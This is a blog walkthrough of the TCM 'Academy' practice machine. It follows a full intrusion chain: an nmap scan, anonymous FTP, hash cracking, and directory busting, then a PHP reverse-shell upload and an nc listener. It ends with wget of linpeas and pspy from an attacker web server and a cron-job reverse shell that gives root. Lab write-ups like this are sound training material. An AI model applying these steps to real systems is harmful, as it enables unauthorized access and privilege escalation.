top of page
Search

ACADEMY WALKTHROUGH

  • Writer: Strider Gearhead
    Strider Gearhead
  • Feb 17, 2023
  • 3 min read

Updated: Feb 20, 2023

This Machine named as ACADEMY and owned by TCM – Here is the link: https://drive.google.com/file/d/1u4628J7AwEzFCS3gWZbJgv-lhGzwmrvf/view?usp=share_link

Firstly, we will open the machine named as Academy and we will get its IP Address. After getting the IP address and we will start with running a NMAP scan with to get to know which ports are open and vulnerable as well. The command for the NMAP scan will be:

nmap -T4 -p- -A <Target IP>

ree

Here we can see that port 21 (FTP) is open and anonymous login is allowed. We will login with ftp and get that note.txt.

We can login through ftp with anonymous access.

The note.txt file contains some information:

ree

Here we can see, password is given in this note and this password looks like a hash so firstly we will identify this hash and crack the hash to get the password. So, we will use Hash Identifier to identify the given hash.

We can use crackstation.net to find and crack the hash on the same time. Here we can see in the below image.

ree

Here we got the password. So now we have usernregno and password. So now we have to check that where can we put these credentials. Now, we will do directory busting using the tool fuff.

Command: fuff -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u <Target ip>/FUZZ

Here we can see that 3 directories has been found and those 3 directories are shown in the below image.

ree

Now we will check academy directory. The picture of login page is given below.

ree

Here we can see that we can login to this page with those credentials, Let’s login into this page.

ree

Here we can see that there is a option of upload so here is a vulnerability. We can upload a php reverse shell script to get the reverse of this target machine on our machine. We can get the script on https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

We have to change the default IP address with our IP address and save that file with .php extension, and upload that file on that student portal to get the reverse shell.

ree

After changing the IP address, we will save this file and upload this to that vulnerable portal to get the reverse shell.

Before uploading this php file we have to setup a listener to catch the reverse shell.

Command: nc -nlvp 1234

ree

After setting up the listener and uploading the php shell, We got the shell and we are www-data.

ree

We don’t have any privilege at the moment, So we will do privilege escalation with the help of LinPeas. Firstly, we have to download linpeas.sh on attacker machine and have to start the http server to download it into the target machine.

Command to start the http server: python -m http.server 80

Now we will download that linpeas.sh on our target machine and will run it.

Command to download from our server: wget http://<ip address>/linpeas.sh

After Downloading that we will run linpeas.sh on our target machine.

In the below image we can see that there is a backup file in home/grimmie/backup.sh

ree

While scrolling the result of linpeas, We found a config.php file containing username and password. The path is /var/www/html/academy/includes/config.php. The image shown below are the credentials.

ree

In the nmap scan we have also know that ssh port was also open so now we will put these credentials to login through ssh.

Command: ssh grimmie@<target ip>

After logging in through ssh we found that there is a backup.sh file.

ree

Now we will use a tool named as pspy to check the running processes without having privilege.

We will download this file into our target machine with our http server.

So now we will give permissions to this file to execute and run pspy64. (chmod +x pspy64)

In the image mentioned below we can see that the backup.sh is executing after some time.

ree

So now we will edit that backup.sh file and put a one liner bash reverse shell script and due to cron jobs it will automatically be executed and we will get our reverse shell.

So like in previous case we will again setup a listener and get the reverse shell of our target machine.

We can get the one liner reverse shell from pentestmonkey.com and we will put our ip address instead of default ip address.

ree

Now after saving this file because it is running as root it will automatically execute and we will catch the reverse shell through our listener.

Now we are root on this machine and there is there is flag.txt

ree

Here is the flag:

ree





 
 
 

Comments

bottom of page